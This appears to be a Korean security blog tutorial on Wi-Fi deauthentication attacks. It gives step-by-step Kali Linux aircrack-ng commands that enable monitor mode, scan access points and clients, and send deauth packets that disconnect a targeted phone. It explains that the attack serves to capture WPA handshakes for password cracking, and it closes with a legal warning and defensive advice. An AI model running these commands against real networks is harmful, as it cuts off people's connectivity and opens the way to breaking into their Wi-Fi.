본문 바로가기

해킹-보안

WI-FI deauth 공격

반응형

ி 설명


WI-FI deauth 공격으로 공유기에 연결된 사용자의 와이파이를 강제로 해제할 수 있다.
외부 네트워크라도 가능하며 접속을 끊을 때 Deauthentication 패킷을 이용한다.
무단으로 다른 네트워크에 사용하는 것은 법적인 책임을 물을 수 있다.



ி 실습


실습에 앞서 칼리리눅스를 설치하고 모니터링 모드가 지원되는 USB 무선랜카드를 준비한다.
노트북에 내장된 무선랜카드는 모니터링 모드 지원 여부에 따라 vm에서 원활하게 동작하지 않을 수 있다.
따라서 별도의 무선랜카드를 준비하는게 좋다. 참고로 필자가 사용한 무선랜은 N150UA SOLO이다.


호스트와 연결된 네트워크를 끊고 준비한 USB 무선랜을 연결한다.
그리고 칼리리눅스에서 무선랜이 연결됐는지 조회한다.

# iwconfig


위 사진처럼 무선랜카드의 모드를 아래 명령을 통해 Monitor 모드로 변경한다.

# airmon-ng stop wlan0
# airmon-ng start wlan0

무선에 연결된 AP를 탐색한다.

# airodump-ng wlan0

BSSID : AP의 맥주소이다. 직접 연결되지 않은 AP라도 모두 탐색된다.
CH : AP와 연결된 채널 번호이다.
ESSID : AP의 이름이다.

iptime 공유기를 대상으로 해당 AP 네트워크에 연결된 장치를 탐색한다.

(새 터미널) # airodump-ng --bssid 88:36:00:00:00:00 -c 9 -w iptime wlan0
--bssid = 대상의 bssid, -c 대상의 채널번호, -w 대상의 ESSID, 무선랜카드명


현재 무선 네트워크에 연결된 장치(STATION)는 세 개가 있다.
각 장치에 대하여 맥주소를 검색해보면 세 번째 단말기가 삼성으로 조회된다.
따라서 와이파이에 연결된 단말기는 삼성 핸드폰인 것을 추측해볼 수 있다.


네트워크에서 해당 단말기의 와이파이 인증을 해제한다.

# aireplay-ng -0 10 -a 88:36:00:00:00:00 -c 64:7B:CE:00:00:00 wlan0
-0 = 인증 해제, 10 = 전송할 deauth의 개수, 값이 0이면 지속적으로 연결을 끊는다. -a = AP의 맥주소, -c = 타겟 맥주소,
이 옵션이 생략되면 모든 STATION에 대해 적용된다. wlan0= 무선랜카드명


명령 전송 후 대상 단말기의 와이파이 연결이 끊어진 것을 확인할 수 있다.



이러한 공격은 deauth 패킷을 활용한 wifi-dos 공격에 해당하며 후속 공격으로 AP의 비밀번호를 알아내는 것도 가능해진다. 
공격자가 deauth 패킷을 보내는 목적은 인증 해제의 목적보다는 연결이 끊어지고 다시 연결될 때 4-wayhandshake 패킷을 
캡처해 무선 네트워크의 암호를 추측하려고 하는 것이다. 아직까지 이러한 공격을 확실하게 막을 수 있는 방법은 없지만 
후속 공격을 방지하기 위해 암호 알고리즘은 WPA2를 사용하고 비밀번호를 강력하게 설정할 것을 권하고 있다. 


반응형

'해킹-보안' 카테고리의 다른 글

오라클과 Mybatis 연동하기  (0) 2021.01.12
DirBuster를 활용한 웹 서버 파일 및 디렉터리 스캔  (0) 2021.01.11
SOP와 CORS 개념  (2) 2020.12.21
크롬 공룡게임 해킹  (0) 2020.12.16
모의해킹 컨설턴트 QNA  (0) 2020.12.15